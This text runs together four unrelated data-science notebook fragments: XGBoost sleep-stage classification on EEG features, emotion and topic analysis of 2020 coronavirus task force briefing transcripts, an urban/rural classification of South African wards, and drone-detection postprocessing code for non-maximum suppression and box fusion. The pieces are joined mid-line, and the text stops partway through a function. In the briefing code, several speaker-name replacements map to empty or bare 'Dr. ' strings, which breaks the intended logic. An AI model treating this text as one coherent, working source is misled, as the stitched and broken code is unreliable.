X_testeeg = test.iloc[:,:-1] y_true = test.iloc[:,-1] print(y.unique()) Xeeg.columns %%time errors = [] Lk = [] La = [] r = range(30, 210, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xeeg, y) ll = log_loss(y_true, xbc.predict_proba(X_testeeg)) errors.append(ll) y_pred = xbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show()trying with decibel (log)- might be a tiny bit better but it could be luckdf = np.log10(eeg) df["Y"] = trainOutput["label"] train = df.iloc[0:int(df.shape[0]*0.8), :] test = df.iloc[int(df.shape[0]*0.8):, :] Xeeg = train.iloc[:,:-1] y = train.iloc[:,-1] X_testeeg = test.iloc[:,:-1] y_true = test.iloc[:,-1] %%time errors = [] Lk = [] La = [] r = range(30, 210, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xeeg, y) ll = log_loss(y_true, xbc.predict_proba(X_testeeg)) errors.append(ll) y_pred = xbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show() #### adding power sum dataPath = "C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\raw\\" eeg = pd.read_excel('C:\\Users\\i053131\\Desktop\\Epilepsie\\Dreem\\data\\interim\\spectrogram_eeg_features30Train.xlsx') trainOutput = pd.read_csv(dataPath + "challenge_fichier_de_sortie_dentrainement_classification_en_stade_de_sommeil_a_laide_de_signaux_mesures_par_le_bandeau_dreem.csv", sep=";") eeg.drop(columns=["eeg1_Above100Hz0", "eeg2_Above100Hz0", "eeg3_Above100Hz0", "eeg4_Above100Hz0"], inplace=True) df = eeg df['eeg_energy']= eeg.sum(axis=1) #df['eeg1_energy'] = eeg.loc[:, 'eeg1_Delta0':'eeg1_Gamma0'].sum(axis=1) #df['eeg2_energy'] = eeg.loc[:, 
'eeg2_Delta0':'eeg2_Gamma0'].sum(axis=1) #df['eeg3_energy'] = eeg.loc[:, 'eeg3_Delta0':'eeg3_Gamma0'].sum(axis=1) #df['eeg4_energy'] = eeg.loc[:, 'eeg4_Delta0':'eeg4_Gamma0'].sum(axis=1) eeg.loc[:, 'eeg1_Delta0':'eeg1_Gamma0'].columns df["Y"] = trainOutput["label"] train = df.iloc[0:int(df.shape[0]*0.8), :] test = df.iloc[int(df.shape[0]*0.8):, :] Xeeg = train.iloc[:,:-1] y = train.iloc[:,-1] X_testeeg = test.iloc[:,:-1] y_true = test.iloc[:,-1] %%time # with energy per captors #log loss = 0.7856534234256973 #kappa = 0.5922992953360089 #with sum of energy of the captors #log loss = 0.7822896453321189 #kappa = 0.5992079234528738 errors = [] Lk = [] La = [] r = range(30, 160, 10) for i in r: xbc = xgb.XGBClassifier(n_estimators = i, random_state=42, learning_rate= 0.1, max_depth= 8, subsample= 0.7, n_jobs=-2, reg_lambda=5) xbc.fit(Xeeg, y) ll = log_loss(y_true, xbc.predict_proba(X_testeeg)) errors.append(ll) y_pred = xbc.predict(X_testeeg) k=cohen_kappa_score(y_true, y_pred) a= accuracy_score(y_true, y_pred) print("considering ", i, " epochs") print("log loss = ", ll) print("kappa = ", k) print("accuracy = ", a) Lk.append(k) La.append(a) plt.plot(r, errors, label = "log loss") plt.legend(loc='upper right') plt.show() plt.plot(r, Lk, label = "kappa") plt.legend(loc='lower right') plt.show()Exploring President Trump's Coronavirus Task Force Briefings with Emotion Analysis and Topic Modelling![](../imgs/trump_task_force.jpg)Given the controversy over the Trump administration's [daily briefings](https://www.nytimes.com/2020/04/09/us/politics/trump-coronavirus-press-briefing.html?referringSource=articleShare) and overall [handling of the COVID-19 pandemic](https://www.nytimes.com/2020/04/14/us/politics/coronavirus-trump-who-funding.html), I thought it would be interesting to apply some of the basic NLP techniques I recently learned to explore this timely, readily available body of text. The analysis below examines all of the White House's task force briefings held from February 26th to April 27th 2020. Scraping Briefing TranscriptsAlthough the briefing transcripts are available on [rev.com](https://www.rev.com) in formatted `.txt` files, I wanted to practice using [BeautifulSoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) for web scraping as part of this project. The scraped transcripts are included [here](https://github.com/brendoncampbell/corona-briefing-tones/blob/master/data/all_briefings.csv), and [`scrape_briefings.py`](https://github.com/brendoncampbell/corona-briefing-tones/blob/master/src/scrape_briefings.py) can be run to rescrape them.After reading in this relatively clean CSV, we have a simple dataframe containing chronological paragraphs of speech `text` along with the corresponding `date`, `timestamp` and `speaker`:import pandas as pd import numpy as np import altair as alt alt.renderers.enable('png') # import scraped csv to pandas df briefings_df = pd.read_csv('../data/all_briefings.csv') briefings_dfNull ValuesChecking for null values, we can see there are actually only three missing `text` values in the near 10,000 rows.briefings_df[briefings_df['text'].isnull()]A quick look at the full transcripts and video recordings confirms these correspond to the speaker interjecting, being cut off, or uttering something inaudible. 
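If we wanted to keep these rows instead, a minimal alternative (a sketch, not used in this analysis) would be to replace the missing values with empty strings:
briefings_df['text'] = briefings_df['text'].fillna('')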
For the purpose of this analysis, let's simply drop these:briefings_df = briefings_df.dropna(subset=['text']).reset_index(drop=True)Cleaning Up Speaker NamesChecking the names of the most frequent speakers, we see a few opportunities to clean up this column before moving on to preprocessing.1. Unnamed speakers identified by a number (i.e. `Speaker 12`) are reset for each briefing, and therefore don't map to the same person.2. President Trump and some of the other key task force members are referenced by multiple names (``, `Dr. `).3. There are a handful of male reporters (John, Jeff, Jim, Peter, and Steve) frequently called upon by their first name.# how many paragraphs of text for the top speakers? briefings_df['speaker'].value_counts()[:40]Let's consolidate these so we have consistent speaker names and group the unnamed speakers under a single name:# replace speaker names using basic regex briefings_df['speaker'].replace(regex={r'.*Trump.*': '', r'.*Pence.*': '', r'.*Fauci.*': 'Dr. ', r'.*Birx.*': 'Dr. ', r'.*Berks.*': 'Dr. Deborah Birx', r'.*Pompeo.*': '', r'.*Report.*': 'Unnamed (Reporter)', r'.*Audience Member.*': 'Unnamed', r'.*Speaker .*': 'Unnamed', r'.*Jeff\Z': 'Jeff (Reporter)', r'.*John\Z': 'John (Reporter)', r'.*Peter\Z': 'Peter (Reporter)', r'.*Jim\Z': 'Jim (Reporter)', r'.*Steve\Z': 'Steve (Reporter)', r'.*Pete\Z': '', r'.*Novarro.*': '', r'.*Surgeon General.*': '', r'.*Giroir.*': '', r'.*Polowczyk.*': '', r'.*Verma.*': '', r'.*Azar.*': '', r'.*Hahn.*': 'Dr. ', r'.*Mnuchin.*': ''}, inplace = True) briefings_df['speaker'].value_counts()[:20]Preprocessing Text Language is inherently unstructured compared to most types of data, so we need to preprocess the text before moving onto analysis. We will carry out this preprocessing and normalize things somewhat using the [spaCy](https://spacy.io) package:1. Convert text to lower-case2. Tokenize (identify word boundaries and split text)3. Remove stop words (frequently-occurring English words that don't tend to be useful for analysis)4. Lemmatize (convert words to their base form: spreading → spread)5. Exclude irrelevant tokens such as emails, URLS and unimportant parts of speech (i.e. pronouns, conjunctions, punctuation)import spacy from pandarallel import pandarallel import re # Load English spaCy model and stop words nlp = spacy.load("en_core_web_sm") from spacy.lang.en.stop_words import STOP_WORDS # function for preprocessing each paragraph of transcript text def preprocess(text, min_token_len = 2, irrelevant_pos = ['ADV','PRON','CCONJ','PUNCT','PART','DET','ADP','SPACE']): """ Carry out preprocessing of the text and return a preprocessed list of strings. 
Parameters ------------- text : (str) the text to be preprocessed min_token_len : (int) min_token_length required irrelevant_pos : (list) a list of irrelevant pos tags Returns ------------- (list) the preprocessed text as a list of strings """ # convert input string to lowercase text = text.lower() # remove multiple whitespace characters text = re.sub(r'\s+',' ', text) # tokenize with spacy, exluding stop words, short tokens, # irrelevant POS, emails, urls, and strings containing # non-alphanumeric chars doc = nlp(text) token_list = [] for token in doc: if token.is_stop == False and len(token.text)>=min_token_len \ and token.pos_ not in irrelevant_pos and token.like_email == False \ and token.like_url == False and token.text.isalnum(): token_list.append(token.lemma_) return token_listApplying the `preprocess()` function defined above to each briefing text:# parallelize and apply preprocessor to each text pandarallel.initialize(verbose=False) briefings_df['pp_text'] = briefings_df.text.parallel_apply(preprocess) briefings_df['pp_text']Let's also create a dataframe that combines all the preprocessed text tokens for a single briefing, for analysis by day:# combine all texts for a single day flatten = lambda l: [item for sublist in l for item in sublist] texts_by_date_df = briefings_df.groupby(by='date')['pp_text'].apply(flatten).to_frame().reset_index()Emotion and Sentiment AnalysisNow that we have a nice clean dataframe to work with, it's time to move on to analysis. Rather than applying the popular [TextBlob](https://textblob.readthedocs.io/en/dev/) or [Vader](https://github.com/cjhutto/vaderSentiment) packages commonly used for sentiment analysis, I thought it would be interesting to also explore the emotional tone of briefing texts.Let's see what we can uncover using the NRC Word-Emotion Association Lexicon, [EmoLex](https://saifmohammad.com/WebPages/NRC-Emotion-Lexicon.htm). 
In addition to 'positive' and 'negative', we have word associations for eight basic emotion categories.# read in raw emotion lexicon filepath = "../NRC-Sentiment-Emotion-Lexicons/NRC-Emotion-Lexicon-v0.92/NRC-Emotion-Lexicon-Wordlevel-v0.92.txt" emolex_df = pd.read_csv(filepath, names=["word", "emotion", "association"], skiprows=1, sep='\t') # pivot df so we have one row per word, one column per emotion emolex_df = emolex_df.pivot(index='word', columns='emotion', values='association').reset_index() emolex_df.columns.name = 'index' # filter out words without scores, as well as those with more than 7 scores emolex_df = emolex_df[emolex_df.sum(axis=1)>0].reset_index(drop=True) emolex_df = emolex_df[emolex_df.sum(axis=1)<7].reset_index(drop=True) emolex_dfWe can now use this lexicon to easily retrieve associations for the words in a single briefing `text`:briefings_df.text[504] print(briefings_df.pp_text[504]) emolex_df[pd.DataFrame(emolex_df.word.tolist()).isin(briefings_df.pp_text[504]).any(1)]Following this approach, let's calculate and store aggregate emotion scores for each briefing paragraph:# create empty df to store aggregated emotion calcs data = pd.DataFrame([]) for tokens in briefings_df['pp_text']: paragraph_emos = emolex_df[pd.DataFrame(emolex_df.word.tolist()).isin(tokens).any(1)].mean() data = data.append(paragraph_emos, ignore_index=True) # combine aggregated emotion scores with transcript df briefings_df = briefings_df.join(data) # drop empty 'word' column, fill NaNs with zero briefings_df = briefings_df.drop(columns=['word']) briefings_df = briefings_df.fillna(0) briefings_df.head()As well as for each complete briefing:# create empty df to store aggregated emotion calcs data = pd.DataFrame([]) for tokens in texts_by_date_df['pp_text']: paragraph_emos = emolex_df[pd.DataFrame(emolex_df.word.tolist()).isin(tokens).any(1)].mean() data = data.append(paragraph_emos, ignore_index=True) # combine aggregated emotion scores with text df texts_by_date_df = texts_by_date_df.join(data) texts_by_date_df.head()Topic ModellingNow that we have emotion and sentiment scores, let's apply topic modelling to see if we can identify the major themes discussed during the briefings and classify each briefing `text` accordingly. 
We'll use the [gensim](https://pypi.org/project/gensim/) package to build a Latent Dirichlet Allocation (LDA) model.

import gensim.corpora as corpora
from gensim import models
import pyLDAvis.gensim

First, we create a dictionary of all of the word tokens we consider relevant for topic modelling:

# build dictionary
corpus = briefings_df['pp_text'].tolist()
dictionary = corpora.Dictionary(corpus)
# filter extremes, removing tokens that appear in either:
# fewer than 10 texts, or in more than 10% of all texts
dictionary.filter_extremes(no_below = 10, no_above = 0.1)
# define words to be manually removed and retrieve their indexes
remove_words = ['crosstalk', 'question', 'inaudible', 'mr', 'sir', 'dr']
del_indexes = [k for k,v in dictionary.items() if v in remove_words]
# remove unwanted word ids from the dictionary
dictionary.filter_tokens(bad_ids=del_indexes)

Next, we build a [document-term co-occurrence matrix](https://en.wikipedia.org/wiki/Document-term_matrix), consisting of the bag-of-words (BoW) representation of each `text`:

doc_term_matrix = [dictionary.doc2bow(doc) for doc in corpus]

With both of these, we can build and visualize an LDA topic model:

lda_model = models.LdaModel(corpus=doc_term_matrix, id2word=dictionary, num_topics=6, passes=20, random_state=123)
viz = pyLDAvis.gensim.prepare(lda_model, doc_term_matrix, dictionary, sort_topics=False)
# enable for interactive topic model visualization:
# pyLDAvis.enable_notebook()
# viz

After inspecting the interactive output rendered by [pyLDAvis](https://github.com/bmabey/pyLDAvis), experimenting with different numbers of topics, and filtering some unhelpful and extreme tokens, we see logical results with the following six topics being identified:
1. Economy
2. International
3. Policy & Guidelines
4. Testing
5. Ventilators & NY Outbreak
6.
Other![](../imgs/topics.png) Now let's use the topic model to predict the topic for each individual `text`:topic_labels = {0:'Economy', 1:'International', 2:'Policy & Guidelines', 3:'Testing', 4:'Ventilators & NY Outbreak', 5:'Other' } def get_most_prob_topic(unseen_text, model = lda_model): """ Given an unseen_document, and a trained LDA model, this function finds the most likely topic (topic with the highest probability) from the topic distribution of the unseen document and returns the best topic Parameters ------------ unseen_text : (str) the text to be labeled with a topic model : (gensim ldamodel) the trained LDA model Returns: ------------- (str) the most likely topic label Examples: ---------- >> get_most_prob_topic("We're building so so so many ventilators.", model = lda) Ventilators """ # obtain bow vector for unseen text bow_vector = dictionary.doc2bow(unseen_text) # calculate topic scores for unseen text scores_df = pd.DataFrame(lda_model[bow_vector], columns =['topic', 'score']) # find topic name of max score topic_name = topic_labels[scores_df.loc[scores_df['score'].idxmax(), 'topic']] best_score = scores_df['score'].max() return topic_name, best_score; # create empty lists to store prediction strings predictions = [] scores = [] # call function for each unseen text, appending predictions to list for text in briefings_df['pp_text'].tolist(): # only predict a topic for texts where there are 4 or more tokens if len(text) > 4: topic, value = get_most_prob_topic(text) predictions.append(topic) scores.append(value) else: predictions.append(np.nan) scores.append(np.nan) # add prediction values to main df briefings_df['topic_pred'] = predictions briefings_df['topic_score'] = scores # save scored df to csv briefings_df.to_csv("../data/scored_briefings.csv",index=False) briefings_df[['pp_text','topic_pred','topic_score']].head()Analysis and Visualization As anyone who was following along might expect, we see that the briefings consistently strike a more positive than negative tone:# prepare dataframe of aggregate sentiment scores by date for altair plotting sentiment_by_date = texts_by_date_df[['positive', 'negative', 'date']] sentiment_by_date = sentiment_by_date.melt(['date'], var_name='emo', value_name='score') # plot aggregated scores alt.Chart(sentiment_by_date).mark_line().encode( alt.X('date:T', axis=alt.Axis(title='Briefing Date', labelAngle=0)), alt.Y('score:Q', axis=alt.Axis(title='Sentiment Score')), alt.Color('emo:N', legend=alt.Legend(title='Sentiment'), sort=['positive']) ).properties( title = 'Sentiment Scores, Aggregated by Briefing', height = 300, width = 800 )As far as emotional tone goes, we see consistently strong scores for 'trust' from briefing to briefing, with 'anticipation' and 'fear' being the next most prevalent:# prepare dataframe of aggregate emotion scores by date for altair plotting emotion_by_date = texts_by_date_df.drop(columns=['positive', 'negative', 'pp_text']) emotion_by_date = emotion_by_date.melt(['date'], var_name='emo', value_name='score') # plot aggregated scores alt.Chart(emotion_by_date).mark_line().encode( alt.X('date:T', axis=alt.Axis(title='Briefing Date', labelAngle=0)), alt.Y('score:Q', axis=alt.Axis(title='Emotion Score')), alt.Color('emo:N', legend=alt.Legend(title='Emotion'), sort=['trust','anticipation','fear','joy','sadness','anger','surprise','disgust']) ).properties( title = 'Emotion Scores, Aggregated by Briefing', height = 400, width = 800 )What about emotion scores with respect to specific topics? 
Looking at a heatmap that shows fear scores broken down by topic, on March 5th and 6th we note an increasingly fearful tone regarding the international spread of the virus. It's worth noting here that Vice President Pence had been the chair of the Task Force from February 26th up until these dates, with President Trump transitioning to be the point person in the days that followed.emo = 'fear' topics_by_date = briefings_df.groupby(['topic_pred', 'date']).mean().reset_index() topics_by_date = topics_by_date.melt(['topic_pred', 'date'], var_name='emo', value_name='score') alt.Chart(topics_by_date[topics_by_date['emo'] == emo]).mark_rect().encode( alt.X('date:O', axis=alt.Axis(title='Briefing Date')), alt.Y('topic_pred:N', axis=alt.Axis(title='Topic')), alt.Color('score:Q', legend=alt.Legend(title=['Aggregated', emo.capitalize()+' Score']), scale=alt.Scale(scheme='lighttealblue')) ).properties(title = 'Heatmap of ' + emo.capitalize() + ' Scores by Topic')Interestingly we also see a more negative tone from Dr. Fauci during these early briefings, with a notable peak on March 6th:# prepare dataframe of aggregate sentiment scores by date for altair plotting facui_df = briefings_df[briefings_df['speaker']=='Dr. '] fauci_by_date = facui_df.groupby(['date']).mean().reset_index() sentiment_by_date = fauci_by_date[['positive', 'negative', 'date']] sentiment_by_date = sentiment_by_date.melt(['date'], var_name='emo', value_name='score') # plot aggregated scores alt.Chart(sentiment_by_date).mark_line().encode( alt.X('date:T', axis=alt.Axis(title='Briefing Date', labelAngle=0)), alt.Y('score:Q', axis=alt.Axis(title='Sentiment Score')), alt.Color('emo:N', legend=alt.Legend(title='Sentiment'), sort=['positive']) ).properties( title = 'Sentiment Scores for Dr. , Aggregated by Briefing', height = 300, width = 800 )Let's look at sentiment scores for some specific words The scores we've calculated can also be used to compare the sentiment or emotion for briefing texts containing specific words, as shown below for 'Hydroxychloroquine' and 'China':# prepare series of aggregate sentiment scores overall_sentiments = briefings_df.mean()[['positive','negative']] hydroxy_sentiments = briefings_df[briefings_df['text'].str.contains("droxy")].mean()[['positive','negative']] china_sentiments = briefings_df[briefings_df['text'].str.contains("Chin")].mean()[['positive','negative']] # merge series into a single df for plotting in altair word_sentiments = pd.concat([overall_sentiments, hydroxy_sentiments, china_sentiments], axis=1).rename(columns={0: "Overall", 1: "Hydroxychloroquine", 2: "China"}).reset_index() word_sentiments = word_sentiments.rename(columns={'index': "sentiment"}) word_sentiments = word_sentiments.melt(['sentiment'], var_name='word', value_name='score') alt.Chart(word_sentiments).mark_bar().encode( alt.X('word:N', axis=alt.Axis(title='')), alt.Y('score:Q', axis=alt.Axis(title='Sentiment Score')), alt.Color('word:N', legend=alt.Legend(title=['Word']), sort=['Overall','Hydroxychloroquine','China']), alt.Facet('sentiment:N', title='Sentiment Scores for Texts Containing Specific Words') )Urban vs. rural regionsaim: classify wards into rural or urbandefinition: population size? 
number households, individuals?+ rural+ urban#import libraries import pandas as pd import numpy as np import seaborn as sns from matplotlib import pyplot as plt %matplotlib inline # import data df = pd.read_csv("/Users/janaconradi/neuefische/Zindi_Data_female_households_RSA/data/Train.csv") # check out data df.head() df.total_individuals.describe() sns.boxplot(data=df.total_individuals) #create a dataframe with only geodata geo_df = df[["ward", "total_individuals", "target", "ADM4_PCODE", "lat", "lon"]] geo_df.tail() geo_df.info() RangeIndex: 2822 entries, 0 to 2821 Data columns (total 6 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 ward 2822 non-null object 1 total_individuals 2822 non-null float64 2 target 2822 non-null float64 3 ADM4_PCODE 2822 non-null object 4 lat 2822 non-null float64 5 lon 2822 non-null float64 dtypes: float64(4), object(2) memory usage: 132.4+ KBData from south african administrative boundariesfrom the Information Technology Outreach Services (ITOS) [link](https://data.humdata.org/dataset/south-africa-admin-level-1-boundaries)admin4_df = pd.read_csv("/Users/janaconradi/neuefische/Zindi_Data_female_households_RSA/data/zaf_adminboundaries_tabulardata - Admin4.csv", decimal=",") admin4_df.head()Data cleaning#make a new dataframe with only needed informations: admin4Pcode and Shape_Area ward_size = admin4_df[["admin4Pcode", "Shape_Area"]] ward_size.head() ward_size.info() # Convert admin4Pcode to string ward_size["admin4Pcode"] = ward_size["admin4Pcode"].astype("string") # rename admin4Pcode to ADM4_PCODE so the name is equal in both df ward_size.rename({"admin4Pcode" : "ADM4_PCODE"}, axis=1, inplace=True) # merge geo_df and ward_size to one table on the zip code geo_df = geo_df.merge(ward_size, on="ADM4_PCODE", how="inner",) # check out new merged table geo_df.head()Shape Areashape_area was in the wrong dimension (units were not given)I used wazimap to confirm my calculations:https://wazimap.co.za/profiles/ward-41601002-letsemeng-ward-2-41601002/# calculation of the population density : number of individuals per km2 geo_df["pop_density"] = geo_df.total_individuals / (geo_df.Shape_Area*10000) geo_df.head()Classification of urban and rural placesAccording to the definition of Statistics South Africa, Census 2001 [link](http://www.statssa.gov.za/census/census_2001/urban_rural/urbanrural.pdf):urban is defined:+ local population size >= 1000+ population density >= 500# query on urban type geo_df.query("pop_density >= 500 & total_individuals >= 1000") #create new column based on threshold, to simplify only pop density as threshold was chosen conditions = [ geo_df['pop_density'] >= 500, #urban geo_df['pop_density'] < 500 #rural ] choices = ["urban","rural"] geo_df["ward_type"] = np.select(conditions, choices, default="NA") geo_df.head(20) geo_df.groupby(by="ward_type").count() geo_df.groupby(by="ward_type").median() sns.barplot(data=geo_df, y="target", x="ward_type") #convert ne dataframe to csv and put it into the data folder geo_df.to_csv("data/geo_df.csv")Postprocessing> Smoothing, combining etc.#hide from nbdev.showdoc import * #export from drone_detector.imports import * from drone_detector.utils import * from skimage.morphology import erosion, dilation from scipy.ndimage.morphology import binary_fill_holesNon-maximum suppression First the commonly used NMS with bounding boxes, that prioritizes either confidence score (default) or bounding box area.# export # Malisiewicz et al. 
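# Greedy NMS: repeatedly keep the remaining box with the highest sort criterion (score or area),
# then discard every other box whose overlap ratio with it exceeds overlap_thresh.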
def non_max_suppression_fast(boxes, scores, overlap_thresh:float, sort_criterion:str='score'): "Possibility to sort boxes by score (default) or area" # if there are no boxes, return an empty list if len(boxes) == 0: return [] # if the bounding boxes integers, convert them to floats -- # this is important since we'll be doing a bunch of divisions if boxes.dtype.kind == "i": boxes = boxes.astype("float") # sort prediction by scores, # initialize the list of picked indexes pick = [] # grab the coordinates of the bounding boxes x1 = boxes[:,0] y1 = boxes[:,1] x2 = boxes[:,2] y2 = boxes[:,3] # compute the area of the bounding boxes and sort the bounding # boxes by the bottom-right y-coordinate of the bounding box area = (x2 - x1 + 1) * (y2 - y1 + 1) if sort_criterion == 'score': idxs = np.argsort(scores) elif sort_criterion == 'area': idxs = np.argsort(area) else: print('Unknown sort criteria, reverting to "score"') idxs = np.argsort(scores) # keep looping while some indexes still remain in the indexes # list while len(idxs) > 0: # grab the last index in the indexes list and add the # index value to the list of picked indexes last = len(idxs) - 1 i = idxs[last] pick.append(i) # find the largest (x, y) coordinates for the start of # the bounding box and the smallest (x, y) coordinates # for the end of the bounding box xx1 = np.maximum(x1[i], x1[idxs[:last]]) yy1 = np.maximum(y1[i], y1[idxs[:last]]) xx2 = np.minimum(x2[i], x2[idxs[:last]]) yy2 = np.minimum(y2[i], y2[idxs[:last]]) # compute the width and height of the bounding box w = np.maximum(0, xx2 - xx1 + 1) h = np.maximum(0, yy2 - yy1 + 1) # compute the ratio of overlap overlap = (w * h) / area[idxs[:last]] # delete all indexes from the index list that have idxs = np.delete(idxs, np.concatenate(([last], np.where(overlap > overlap_thresh)[0]))) # return indices for selected bounding boxes return pick #return boxes[pick].astype("int")Non-max suppression can in theory be applied also on polygons, but it hasn't been used in any publications as far as I know.If `non_max_suppression_poly` is used to eliminate polygons, threshold might need to be smaller than typical value of 0.7 that is used.# export from drone_detector.metrics import poly_IoU def non_max_suppression_poly(geoms, scores, overlap_thresh:float, sort_criterion:str='score'): "Possibility to sort geoms by score (default) or area" # if there are no geoms, return an empty list if len(geoms) == 0: return [] # sort prediction by scores, # initialize the list of picked indexes pick = [] # compute the area of the bounding geoms and sort the bounding # geoms by the bottom-right y-coordinate of the bounding box area = np.array([geom.area for geom in geoms]) if sort_criterion == 'score': idxs = np.argsort(scores) elif sort_criterion == 'area': idxs = np.argsort(area) else: print('Unknown sort criteria, reverting to "score"') idxs = np.argsort(scores) # keep looping while some indexes still remain in the indexes # list while len(idxs) > 0: # grab the last index in the indexes list and add the # index value to the list of picked indexes last = len(idxs) - 1 i = idxs[last] pick.append(i) # compute the ratio of overlap with all other polygons overlap = np.array([poly_IoU(geoms[i], geoms[k]) for k in idxs[:last]]) # delete all indexes from the index list that have # overlap larger than overlap_thresh idxs = np.delete(idxs, np.concatenate(([last], np.where(overlap > overlap_thresh)[0]))) # return indices for selected bounding geoms return pickSome utils to run above functions to `GeoDataFrames`# 
export def do_nms(gdf:gpd.GeoDataFrame, nms_thresh=0.7, crit='score'): gdf = gdf.copy() np_bboxes = np.array([b.bounds for b in gdf.geometry]) scores = gdf.score.values idxs = non_max_suppression_fast(np_bboxes, scores, nms_thresh, crit) gdf = gdf.iloc[idxs] return gdf def do_poly_nms(gdf:gpd.GeoDataFrame, nms_thresh=0.1, crit='score'): gdf = gdf.copy() scores = gdf.score.values idxs = non_max_suppression_poly(gdf.geometry.values, scores, nms_thresh, crit) gdf = gdf.iloc[idxs] return gdf def do_min_rot_rectangle_nms(gdf:gpd.GeoDataFrame, nms_thresh=0.7, crit='score'): gdf = gdf.copy() scores = gdf.score.values boxes = np.array([g.minimum_rotated_rectangle for g in gdf.geometry.values]) idxs = non_max_suppression_poly(boxes, scores, nms_thresh, crit) gdf = gdf.iloc[idxs] return gdfWeighted boxes fusionOriginally presented by [Solovyev et al (2021)](https://arxiv.org/abs/1910.13302), and available in [https://github.com/ZFTurbo/Weighted-Boxes-Fusion]. Code presented here is modified to keep track of original bounding boxes for mask fusion, and due to numpy version requirements we do not use numba here. As WBF expects normalized coordinates, first some helpers to normalize and denormalize geocoordinates.# export def normalize_bbox_coords(tot_bounds, bboxes): xmin = tot_bounds[0] ymin = tot_bounds[1] width = tot_bounds[2] - tot_bounds[0] height = tot_bounds[3] - tot_bounds[1] norm_bboxes = [((b[0]-xmin)/(width), (b[1]-ymin)/(height), (b[2]-xmin)/(width), (b[3]-ymin)/(height)) for b in bboxes] return norm_bboxes def denormalize_bbox_coords(tot_bounds, bboxes): xmin = tot_bounds[0] ymin = tot_bounds[1] width = tot_bounds[2] - tot_bounds[0] height = tot_bounds[3] - tot_bounds[1] norm_bboxes = [((b[0]*width+xmin), (b[1]*height+ymin), (b[2]*width+xmin), (b[3]*height+ymin)) for b in bboxes] return norm_bboxes # export import warnings def bb_intersection_over_union(A, B) -> float: xA = max(A[0], B[0]) yA = max(A[1], B[1]) xB = min(A[2], B[2]) yB = min(A[3], B[3]) # compute the area of intersection rectangle interArea = max(0, xB - xA) * max(0, yB - yA) if interArea == 0: return 0.0 # compute the area of both the prediction and ground-truth rectangles boxAArea = (A[2] - A[0]) * (A[3] - A[1]) boxBArea = (B[2] - B[0]) * (B[3] - B[1]) iou = interArea / float(boxAArea + boxBArea - interArea) return iou def prefilter_boxes(boxes, scores, labels, weights, thr): # Create dict with boxes stored by its label new_boxes = dict() for t in range(len(boxes)): if len(boxes[t]) != len(scores[t]): print('Error. Length of boxes arrays not equal to length of scores array: {} != {}'.format(len(boxes[t]), len(scores[t]))) sys.exit() if len(boxes[t]) != len(labels[t]): print('Error. Length of boxes arrays not equal to length of labels array: {} != {}'.format(len(boxes[t]), len(labels[t]))) sys.exit() for j in range(len(boxes[t])): score = scores[t][j] if score < thr: continue label = int(labels[t][j]) box_part = boxes[t][j] x1 = max(float(box_part[0]), 0.) y1 = max(float(box_part[1]), 0.) x2 = max(float(box_part[2]), 0.) y2 = max(float(box_part[3]), 0.) # Box data checks if x2 < x1: warnings.warn('X2 < X1 value in box. Swap them.') x1, x2 = x2, x1 if y2 < y1: warnings.warn('Y2 < Y1 value in box. Swap them.') y1, y2 = y2, y1 if x1 > 1: warnings.warn('X1 > 1 in box. Set it to 1. Check that you normalize boxes in [0, 1] range.') x1 = 1 if x2 > 1: warnings.warn('X2 > 1 in box. Set it to 1. Check that you normalize boxes in [0, 1] range.') x2 = 1 if y1 > 1: warnings.warn('Y1 > 1 in box. Set it to 1. 
Check that you normalize boxes in [0, 1] range.') y1 = 1 if y2 > 1: warnings.warn('Y2 > 1 in box. Set it to 1. Check that you normalize boxes in [0, 1] range.') y2 = 1 if (x2 - x1) * (y2 - y1) == 0.0: warnings.warn("Zero area box skipped: {}.".format(box_part)) continue # [label, score, weight, model index, x1, y1, x2, y2] b = [int(label), float(score) * weights[t], weights[t], t, x1, y1, x2, y2] if label not in new_boxes: new_boxes[label] = [] new_boxes[label].append(b) # Sort each list in dict by score and transform it to numpy array for k in new_boxes: current_boxes = np.array(new_boxes[k]) new_boxes[k] = current_boxes[current_boxes[:, 1].argsort()[::-1]] return new_boxes def get_weighted_box(boxes, conf_type='avg'): """ Create weighted box for set of boxes :param boxes: set of boxes to fuse :param conf_type: type of confidence one of 'avg' or 'max' :return: weighted box (label, score, weight, x1, y1, x2, y2) """ box = np.zeros(8, dtype=np.float32) conf = 0 conf_list = [] w = 0 for b in boxes: box[4:] += (b[1] * b[4:]) conf += b[1] conf_list.append(b[1]) w += b[2] box[0] = boxes[0][0] if conf_type == 'avg': box[1] = conf / len(boxes) elif conf_type == 'max': box[1] = np.array(conf_list).max() elif conf_type in ['box_and_model_avg', 'absent_model_aware_avg']: box[1] = conf / len(boxes) box[2] = w box[3] = -1 # model index field is retained for consistensy but is not used. box[4:] /= conf return box def find_matching_box_quickly(boxes_list, new_box, match_iou): """ Reimplementation of find_matching_box with numpy instead of loops. Gives significant speed up for larger arrays (~100x). This was previously the bottleneck since the function is called for every entry in the array. """ def bb_iou_array(boxes, new_box): # bb interesection over union xA = np.maximum(boxes[:, 0], new_box[0]) yA = np.maximum(boxes[:, 1], new_box[1]) xB = np.minimum(boxes[:, 2], new_box[2]) yB = np.minimum(boxes[:, 3], new_box[3]) interArea = np.maximum(xB - xA, 0) * np.maximum(yB - yA, 0) # compute the area of both the prediction and ground-truth rectangles boxAArea = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) boxBArea = 